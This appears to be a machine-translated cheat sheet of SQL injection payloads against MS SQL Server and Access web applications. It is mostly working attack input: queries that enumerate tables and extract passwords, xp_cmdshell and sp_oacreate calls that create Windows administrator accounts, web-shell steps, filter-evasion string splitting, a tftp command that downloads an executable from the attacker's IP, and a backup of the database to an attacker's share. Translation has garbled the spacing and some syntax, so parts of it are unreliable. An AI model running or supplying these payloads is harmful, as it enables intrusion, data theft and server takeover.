2. Tech
  3. SQL injection summary (strongly recommended)

SQL injection summary (strongly recommended)

xiaoxiao2021-03-06  116

SQL injection summary (native to 'or'1' = '1)

The most important table name:

SELECT *

SYSOBJECTS NCSYSOBJECTS

Sysindexes TsysIndexes

Syscolumns

Systypes

Sysusers

Sysdatabases

Sysxlogins

Sysprocesses

The most important user name (the default SQL database exists)

public

DBO

Guest (general prohibition, or no authority)

DB_SercurityAdmin

Ab_dlladmin

Some default extensions

XP_REGADDMULTINTISTRING

XP_RegdeleteKey

XP_Regdeletevalue

XP_RegenumKeys

XP_RegenumValues

XP_REGREAD

XP_REGREMOVEMULTINTRING

XP_Regwrite

XP_AVAILAMEDIA drive

XP_dirtree directory

XP_enumdsn ODBC connection

XP_LogInConfig Server Security Mode Information

XP_makecab creates a compressed volume

XP_NTSEC_ENUMDOMAINS DOMAIN Information

XP_TERMINATE_PROCESS terminal process, give a PID

E.g:

sp_addextendedProc 'XP_Webserver', 'C: /TEMP/XP_foo.dll'

EXEC XP_WEBSERVER

sp_dropextendedProc 'XP_WEBServer'

BCP "Select * from test..foo" Queryout c: /inetpub/wwwroot/runcommand.asp -c -slocalhost -usa -pfoobar

'Group by users.id Having 1 = 1-

'Group by users.id, users.username, users.password, users.privs haVing 1 = 1-

'; INSERT INTO Users Values ​​(666,' Attacker ',' Foobar ', 0xfff) -

Union Select Top 1 Column_Name from Information_schema.columns Where Table_Name = 'logintable'-

Union Select Top 1 Column_name from Information_Schema.Columns Where Table_name = 'logintable' where colorn_name not in ('login_id') -

Union Select Top 1 Column_name from Information_Schema.Columns Where Table_name = 'logintable' Where Column_Name Not in ('login_id', 'login_name')

Union Select Top 1 login_name from logintable-

Union Select Top 1 Password from logintable where login_name = 'rahul' -

Constructing statement: Whether the query exists xp_cmdshell

'Union select @@ version, 1, 1, 1 - and 1 = (select @@ version)

And 'sa' = (Select System_User)

'Union Select Ret, 1,1,1 from foo -

'Union select min (username), 1,1,1 from users where username>' A'-

'Union select min (username), 1, 1, 1 from username>' admin'-

'Union Select Password, 1,1,1 from users where username =' admin '

And user_name () = 'dbo'

And 0 <> (Select User_Name () -

DECLARE @Shell int exec sp_oacreate 'wscript.shell', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: /winnt/system32/cmd.exe / c net user swap 5245886 / add'

AND 1 = (Select Count (*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell'

; Exec master.dbo.sp_addextendedProc 'xp_cmdshell', 'XPLog70.dll'

1 = (% 20Select% 20count (*)% 20FROM% 20master.dbo.sysobjects% 20where% 20 type = 'x'% 20and% 20name = 'xp_cmdshell')

And 1 = (select is_srvrolemember ('sysadmin')) determines if the SA authority is

And 0 <> (SELECT TOP 1 Paths from NewTable) - Branches Dafa

And 1 = (select name from master.dbo.sysdatabases where dbid = 7) Get the library name (from 1 to 5 is the iD of the system, 6 or more can be judged)

Create a virtual directory E disk:

Declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null, 'cscript.exe c: /inetpub/wwroot/mkwebdir.vbs -w "default Web site" -v " e "," e: / "'

Access attribute: (write a WebShell)

Declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null, 'cscript.exe c: /inetpub/wwroot/chaccess.vbs -a w3svc / 1 / root / e Browse'and 0 <> (Select Count (*) from master.dbo.sysdatabases where name> 1 and dbid = 6)

Submit DBID = 7, 8, 9 .... get more database name

And 0 <> (Select Top 1 Name from bbs.dbo.sysobjects where xtype = 'u') Vacuum is assumed to be admin

AND 0 <> (Select Top 1 Name from bbs.dbo.sysObjects where xtype = 'u' and name not in ('admin')) is available.

And 0 <> (Select Count (*) from bbs bbs.dbo.sysobjects where xtype = 'u' and name = 'admin'

And Uid> (STR (ID))) Value Value Value Assumption is 18779569 UID = ID

And 0 <> (Select Top 1 Name from bbs.dbo.syscolumns where id = 18779569) Get a field of Admin, assume User_ID

And 0 <> (Select Top 1 Name from bbs.dbo.syscolumns where id = 18779569 and name not in

('id', ...)) to out of other fields

AND 0 <(Select User_id from bbs.dbo.admin where username> 1) You can get your username

You can get a password in turn. . . . . Assume that the presence of user_id username, password and other fields

Show.asp? Id = -1 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from admin

Show.asp? Id = -1 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, *, 9, 10, 11, 12, 13 from admin

(Union statement is popular everywhere, Access is also used

Exposition Special Tips ::% 5c = '/' or submit / and / modified% 5

And 0 <> (Select Count (*) from master.dbo.sysdatabases where name> 1 and dbid = 6)

AND 0 <> (Select Top 1 Name from bbs.dbo.sysobjects where xtype = 'u') gets a table name

And 0 <> (Select Top 1 Name from bbs bbs.dbo.sysobjects where xtype = 'u' and name not in ('address'))

And 0 <> (Select Count (*) from bbs.dbo.sysobjects where xtype = 'u' and name = 'admin' and uid> (STR (ID))) Judgment ID value and 0 <> (SELECT TOP 1 Name From bbs.dbo.syscolumns where id = 773577794) All fields

http: //xx.xx.xx.xx/111.asp? id = 3400; Create Table [DBO]. [swap] ([swappass] [char] (255));

http://xx.xx.xx.xx/111.asp? id = 3400 and (select top 1 swappass from swap) = 1

; Create TABLE newtable (id int IDENTITY (1,1), paths varchar (500)) Declare @test varchar (20) exec master..xp_regread @ rootkey = 'HKEY_LOCAL_MACHINE', @ key = 'SYSTEM / CurrentControlSet / Services / W3SVC / Parameters / virtual roots / ', @Value_name =' / ', values ​​= @ Test Output Insert INTO PATHS (PATH) VALUES (@test)

http://61.131.96.39/pageshow.asp?tianname= Policy Regulations & Infoid = {57C4165A-4206-4C0D-A8D2-E70666EE4E08}; USE% 20Master; Declare% 20 @ s% 20% 20INT; EXEC% 20sp_oacreate% 20 " Wscript.shell, @ s% 20OUT; EXEC% 20sp_oamethod% 20 @ s, "run", null, "cmd.exe% 20 / c% 20PING% 201.1.1.1";

Get the web path D: / xxxx, next:

http://xx.xx.xx.xx/111.asp? id = 3400; use ku1; -

http: //xx.xx.xx.xx/111.asp? id = 3400; CREATE TABLE CMD (STR Image);

Traditional Test Procedures for the presence XP_cmdshell:

; exec master..xp_cmdshell 'DIR'

EXEC MASTER.DBO.SP_ADDLOGIN HAX;

EXEC MASTER.DBO.SP_Password NULL, HAX, HAX;

EXEC MASTER.DBO.SP_ADDSRVROLEMEMBER HAX SYSADMIN;

EXEC MASTER.DBO.XP_CMDSHELL 'NET USER HAX 5258 / WORKSTATIONS: * / TIMES: ALL / Passwordchg: Yes / PasswordReq: Yes / Active: Yes / Add';

; exec master.dbo.xp_cmdshell 'net localgroup administrators Hax / add';

Exec master..xp_serviceControl 'Start', 'Schedule'

exec master..xp_servicecontrol 'start', 'server'http: //www.xxx.com/list.asp classid = 1; DECLARE @shell INT EXEC SP_OAcreate?' wscript.shell ', @ shell OUTPUT EXEC SP_OAMETHOD @shell, 'Run', NULL, 'C: /WINNT/SYSTEM32/Cmd.exe / C Net User SWAP 5258 / Add'

; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell', @ shell OUTPUT EXEC SP_OAMETHOD @ shell, 'run', null, 'C: /WINNT/system32/cmd.exe / c net localgroup administrators swap / add'

http://localhost/show.asp? id = 1 '; exec master..xp_cmdshell' tftp -i youip get file.exe'-

Declare @a sysname set @ a = 'xp _' 'cmdshell' exec @a 'DIR C: /'

Declare @a sysname set @ a = 'xp' '_ cm' 'dshell' exec @a 'DIR C: /'

DECLARE @A; set @ a = db_name (); backup database @a to disk = 'your IP Your shared directory Bak.dat'

If it is limited, it can be.

Select * from OpenRowSet ('sqloledb', 'Server'; 'sa'; '', 'SELECT' 'OK!' 'EXEC MASTER.DBO.SP_ADDLOGIN HAX'

Traditional query constructor:

Select * from news where id = ... and Topic = ... and .....

Admin'and 1 = (Select Count (*) from [user] where username = 'Victim' And Right (Left (userpass, 01), 1) = '1') And userpass <> '

SELECT 123; -

Use masters;

: a 'or name like' fff% '; - Show a user named FFFF.

'and 1 <> (Select Count (email) ");

; Update [users] set email = (Select Top 1 Name from sysobjects where xtype = 'u' and status> 0) Where name = 'fff';

Description:

The above statement is to get the first user table in the database and place the table name in the mailbox field of the FFFF user.

You can get the first table called AD by viewing the user profile of FFFF.

Then get this table IDFFF '; UPDATE [USERS] set email = (SELECT TOP 1 ID from sysObjects where xtype =' u 'and name =' ad ') Where name =' fff ';

You can get the name of the second table like this.

FFFF '; Update [users] set email = (Select Top 1 Name from sysobjects where xtype =' u 'and id> 581577110) Where name =' fff ';

FFFF '; Update [users] set email = (select top 1 count (id) from password) where name =' fff ';

FFFF '; Update [users] set email = (Select Top 1 PWD from password where id = 2) Where name =' fff ';

FFFF '; Update [users] set email = (select top 1 name from password where id = 2) Where name =' fff ';

Exec master..xp_serviceControl 'Start', 'Schedule'

Exec master..xp_serviceControl 'Start', 'Server'

sp_addextendedProc 'XP_Webserver', 'C: /TEMP/XP_foo.dll'

Extended storage can be called through a general method:

EXEC XP_WEBSERVER

Once this extension store is executed, you can delete it like this:

sp_dropextendedProc 'XP_WEBServer'

INSERT INTO Users Values ​​(666, Char (0x63) Char (0x68) Char (0x72) CHAR (0x69) CHAR (0x73), Char (0x63) CHAR (0x68) CHAR (0x72) char (0x69 CHAR (0x73), 0xfff) -

INSERT INTO USERS VALUES (667, 123, 123, 0xFFF) -

INSERT INTO USERS VALUES (123, 'Admin' '-', 'Password', 0xfff) -

And user> 0

; And (select count (*) from sysobjects> 0

;; and (select count (*) from mysysObjects> 0 // for Access database

-------------------------------------------------- --------- Some of usually injected:

A) ID = 49 This type of injected parameter is a digital type, and the SQL statement is protrassed as follows:

SELECT * FROM table name Where field = 49

The injected parameter is ID = 49 and [query condition], that is, the generated statement:

SELECT * FROM table name where field = 49 and [query condition]

(B) Class = Continuous drama The parameters of the injected parameters are character patterns, and the SQL statement is generally approrated: SELECT * FROM table name where field = 'series of series

The parameters of the injected are class = series 'and "query conditions] and' '=', that is, the generated statement:

SELECT * FROM table name where field = 'series of series' and "query conditions] and '' = ''

(C) No filtering parameters when searching, such as keyword = keyword, SQL statement is roughly as follows:

SELECT * FROM table name where field like '% keyword%'

The injected parameter is keyword = 'and'% 25 '=', ie generating statement:

SELECT * FROM table name Where field Like '%' and [query conditions] and '%' = '%'

;; and (select top 1 name from sysobjects where xtype = 'u' and status> 0)> 0

Sysobjects is the system table of SQL Server, stores all table names, views, constraints, and other objects, Xtype = 'u' and status> 0, indicating the table name established by the user, the above statement will be removed in the first table name, with 0 is relatively small, let the error information expose the table name.

;; and (select top 1 col_name (Object_ID ('Name'), 1) from sysobjects> 0

After getting the table name from 5, use Object_ID ('Name') to get the internal ID, col_name (Name ID, 1) of the table name, represent the first field name of the table, change 1 to 2, 3, 4 ... You can get the field name inside the guess table one by one.

POST.HTM content: It is mainly convenient to enter.